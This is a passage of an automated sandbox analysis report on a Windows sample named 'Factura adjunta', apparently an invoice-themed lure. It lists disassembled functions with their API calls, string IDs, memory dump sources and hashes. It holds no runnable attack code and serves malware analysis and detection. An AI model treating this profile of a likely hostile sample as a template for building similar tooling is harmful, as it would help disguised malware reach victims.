                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: b532cb07e00db2cebc5f2bdd492acbf711cb048161ed03342cde7e097af61e0d
                            • Instruction ID: 6267ec4b30fee184abdc69f0c5d7bf5ed07ef8b41d571e5087a4d24577ce2d64
                            • Opcode Fuzzy Hash: b532cb07e00db2cebc5f2bdd492acbf711cb048161ed03342cde7e097af61e0d
                            • Instruction Fuzzy Hash: 29313C31A4420AE6DB14FA60CD47FEE77A9FF20750F600129F4A1F62D6EF6A6E04C552
                            Function 0080C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • LoadIconW.USER32(00000063), ref: 0080C4D4
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0080C4E6
                            • SetWindowTextW.USER32(?,?), ref: 0080C4FD
                            • GetDlgItem.USER32(?,000003EA), ref: 0080C512
                            • SetWindowTextW.USER32(00000000,?), ref: 0080C518
                            • GetDlgItem.USER32(?,000003E9), ref: 0080C528
                            • SetWindowTextW.USER32(00000000,?), ref: 0080C52E
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0080C54F
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0080C569
                            • GetWindowRect.USER32(?,?), ref: 0080C572
                            • SetWindowTextW.USER32(?,?), ref: 0080C5DD
                            • GetDesktopWindow.USER32 ref: 0080C5E3
                            • GetWindowRect.USER32(00000000), ref: 0080C5EA
                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0080C636
                            • GetClientRect.USER32(?,?), ref: 0080C643
                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0080C668
                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0080C693
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 80f36e3b66a6e75eb3e68d8573ccb38131e3a4392359267b4cb5620f37d5cc6b
                            • Instruction ID: 4a847e36cbe2e3ae0dbd4f96bc42d6deaf533fcf5bc613c6498c2b27eaaeda88
                            • Opcode Fuzzy Hash: 80f36e3b66a6e75eb3e68d8573ccb38131e3a4392359267b4cb5620f37d5cc6b
                            • Instruction Fuzzy Hash: 63516E70900709AFDB20DFA8DD8AB6FBBF5FF44705F004A28E686E25A1D775A944CB50
                            Function 00834619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 008346AB
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008346F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: fc602106a085ed07e07cf29345840881f35d3d0c02edb50f97df50dc62530163
                            • Instruction ID: e3cfdbb9e1b93631989fc338026b1d12c1dadfedb0c30a948e2a48e1bd7c61d3
                            • Opcode Fuzzy Hash: fc602106a085ed07e07cf29345840881f35d3d0c02edb50f97df50dc62530163
                            • Instruction Fuzzy Hash: A8916D34204305DBCB14EF20C855BAAB7A5FF95314F04986DB9969B3A2DB34FD4ACB81
                            Function 0083BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0083BB6E
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00839431), ref: 0083BBCA
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083BC03
                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0083BC46
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083BC7D
                            • FreeLibrary.KERNEL32(?), ref: 0083BC89
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083BC99
                            • DestroyCursor.USER32(?), ref: 0083BCA8
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0083BCC5
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0083BCD1
                              • Part of subcall function 007D313D: __wcsicmp_l.LIBCMT ref: 007D31C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 3907162815-1154884017
                            • Opcode ID: a475f47956f503e10a0f9029f0b2e7f31acd642d7c698e684c592da9f8f89d59
                            • Instruction ID: 91bdfd915d26f97f329635bac729c5ffe8d2c0264931d6b3df6d6a735bc42d61
                            • Opcode Fuzzy Hash: a475f47956f503e10a0f9029f0b2e7f31acd642d7c698e684c592da9f8f89d59
                            • Instruction Fuzzy Hash: BC61F1B1A00219FAEB24DF64CC46FBE77A8FF48720F104516FA15D61C1DB78A981CBA0
                            Function 0081A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • CharLowerBuffW.USER32(?,?), ref: 0081A636
                            • GetDriveTypeW.KERNEL32 ref: 0081A683
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A6CB
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A702
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A730
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 36bac38dae4c2dced1a982284251b81d63b85272bf3d64948abda70366280a95
                            • Instruction ID: 5f2a0cde4db4334d69a3e4e4e42f28d9995a30644fdc280bff7b9d63f492ccf0
                            • Opcode Fuzzy Hash: 36bac38dae4c2dced1a982284251b81d63b85272bf3d64948abda70366280a95
                            • Instruction Fuzzy Hash: 50514C71104204DFC704EF20C9859AAB7F8FF94718F04895DF896A72A1DB35EE0ACB52
                            Function 007B21A5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • GetSysColor.USER32(0000000F), ref: 007B21D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID: h)
                            • API String ID: 259745315-3328819710
                            • Opcode ID: 01640e73ef46eb20eee03b8283d105ccec5610023b5628825c81dd8f5de94f24
                            • Instruction ID: cd990919c29aae21715ca1de510739580722a6286121708c2c0ce204e289a7fc
                            • Opcode Fuzzy Hash: 01640e73ef46eb20eee03b8283d105ccec5610023b5628825c81dd8f5de94f24
                            • Instruction Fuzzy Hash: 8D41BC31402144AADB265F28EC88BF93B65FB46331F194265FE65CA1E7C7398C43DB61
                            Function 0081A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0081A47A
                            • __swprintf.LIBCMT ref: 0081A49C
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0081A4D9
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0081A4FE
                            • _memset.LIBCMT ref: 0081A51D
                            • _wcsncpy.LIBCMT ref: 0081A559
                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0081A58E
                            • CloseHandle.KERNEL32(00000000), ref: 0081A599
                            • RemoveDirectoryW.KERNEL32(?), ref: 0081A5A2
                            • CloseHandle.KERNEL32(00000000), ref: 0081A5AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: 3f2cbe49ed80ac08589ef19a7256b84a3cd7aaa4cca1e036a3c36f8dce16261d
                            • Instruction ID: 4d63aea772edbf1a83be984e561c0728ccbd13b2dd7b72a555db49401c125e50
                            • Opcode Fuzzy Hash: 3f2cbe49ed80ac08589ef19a7256b84a3cd7aaa4cca1e036a3c36f8dce16261d
                            • Instruction Fuzzy Hash: AE3190B5904109ABDB219FA0DC49FEB73BDFF88701F1041B6FA08D2161E77496858B65
                            Function 0081DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 0081DC7B
                            • _wcscat.LIBCMT ref: 0081DC93
                            • _wcscat.LIBCMT ref: 0081DCA5
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081DCBA
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DCCE
                            • GetFileAttributesW.KERNEL32(?), ref: 0081DCE6
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0081DD00
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DD12
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: b0b499923064db58e7fae7b9acc6eef335d2768e99c99e7185beaf04188655f7
                            • Instruction ID: 1309faa9badb5fc6f37840de7268890e17f67dc137233a61891ab31822c273bd
                            • Opcode Fuzzy Hash: b0b499923064db58e7fae7b9acc6eef335d2768e99c99e7185beaf04188655f7
                            • Instruction Fuzzy Hash: 338161715083459FC724DF24C485AEAB7E8FF88314F158C2AF586D7251E634E985CB92
                            Function 00837192 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00837214
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00837217
                            • GetWindowLongW.USER32(?,000000F0), ref: 0083723B
                            • _memset.LIBCMT ref: 0083724C
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0083725E
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008372D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID: h)
                            • API String ID: 830647256-3328819710
                            • Opcode ID: 034e8778019afe6eee4fe16d89de7eb6f34610a08652d5b9de7d717e665242ea
                            • Instruction ID: 92fe7f4dd715b5182d6a01efe9843937a58dc265ca18af63da6bd6cca49f9844
                            • Opcode Fuzzy Hash: 034e8778019afe6eee4fe16d89de7eb6f34610a08652d5b9de7d717e665242ea
                            • Instruction Fuzzy Hash: 526179B5900208AFDB20DFA8CC81EEE77B8FB49704F144169FA14E73A1D770A955DBA0
                            Function 008083F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0080874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00808766
                              • Part of subcall function 0080874A: GetLastError.KERNEL32(?,0080822A,?,?,?), ref: 00808770
                              • Part of subcall function 0080874A: GetProcessHeap.KERNEL32(00000008,?,?,0080822A,?,?,?), ref: 0080877F
                              • Part of subcall function 0080874A: RtlAllocateHeap.NTDLL(00000000,?,0080822A), ref: 00808786
                              • Part of subcall function 0080874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0080879D
                              • Part of subcall function 008087E7: GetProcessHeap.KERNEL32(00000008,00808240,00000000,00000000,?,00808240,?), ref: 008087F3
                              • Part of subcall function 008087E7: RtlAllocateHeap.NTDLL(00000000,?,00808240), ref: 008087FA
                              • Part of subcall function 008087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00808240,?), ref: 0080880B
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00808458
                            • _memset.LIBCMT ref: 0080846D
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0080848C
                            • GetLengthSid.ADVAPI32(?), ref: 0080849D
                            • GetAce.ADVAPI32(?,00000000,?), ref: 008084DA
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008084F6
                            • GetLengthSid.ADVAPI32(?), ref: 00808513
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00808522
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00808529
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0080854A
                            • CopySid.ADVAPI32(00000000), ref: 00808551
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00808582
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008085A8
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008085BC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 2347767575-0
                            • Opcode ID: 4610a26ed91bfa940eb4ab492a769483d110068fce105fc5800850cb3f8953b7
                            • Instruction ID: 64b8dbd7f12d3a83dd0ecc30de6cb0518071f40413b8b929536ad9814f4732f9
                            • Opcode Fuzzy Hash: 4610a26ed91bfa940eb4ab492a769483d110068fce105fc5800850cb3f8953b7
                            • Instruction Fuzzy Hash: B161367190020AEFDF04DFA4DC45AAEBBB9FF44300F148569E955E7291DB319A45CFA0
                            Function 0082762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 008276A2
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008276AE
                            • CreateCompatibleDC.GDI32(?), ref: 008276BA
                            • SelectObject.GDI32(00000000,?), ref: 008276C7
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0082771B
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00827757
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0082777B
                            • SelectObject.GDI32(00000006,?), ref: 00827783
                            • DeleteObject.GDI32(?), ref: 0082778C
                            • DeleteDC.GDI32(00000006), ref: 00827793
                            • ReleaseDC.USER32(00000000,?), ref: 0082779E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: 777cacc629b067d3b8118c9eae0e0dc72e5ee353030798460b217f9638e90149
                            • Instruction ID: a1e24af459b942c6543779862525dc302eb6b11ebed8f45fc230723fb2844ac4
                            • Opcode Fuzzy Hash: 777cacc629b067d3b8118c9eae0e0dc72e5ee353030798460b217f9638e90149
                            • Instruction Fuzzy Hash: 87514875904619EFCB15CFA9DC85EAEBBB9FF48310F14842DFA4A97211D731A8408BA0
                            Function 0081A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(00000066,?,00000FFF,0083FB78), ref: 0081A0FC
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0081A11E
                            • __swprintf.LIBCMT ref: 0081A177
                            • __swprintf.LIBCMT ref: 0081A190
                            • _wprintf.LIBCMT ref: 0081A246
                            • _wprintf.LIBCMT ref: 0081A264
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LoadString__swprintf_wprintf$_memmove
                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 311963372-2391861430
                            • Opcode ID: 3ee0fe56dbec3820ef642bfad2427dda13ee299425f7de170049b106fc37713b
                            • Instruction ID: 99c44388ec1a739d88d251f97741e63d5f10e26a46c27fcda654e8c20e36eda6
                            • Opcode Fuzzy Hash: 3ee0fe56dbec3820ef642bfad2427dda13ee299425f7de170049b106fc37713b
                            • Instruction Fuzzy Hash: 31514C71904109EACF19EBA0CD8AEEEB779FF04300F144165F515B21A2EB396F98DB61
                            Function 007B6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007B6C6C,?,00008000), ref: 007D0BB7
                              • Part of subcall function 007B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B48A1,?,?,007B37C0,?), ref: 007B48CE
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6D0D
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 007B6E5A
                              • Part of subcall function 007B59CD: _wcscpy.LIBCMT ref: 007B5A05
                              • Part of subcall function 007D387D: _iswctype.LIBCMT ref: 007D3885
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
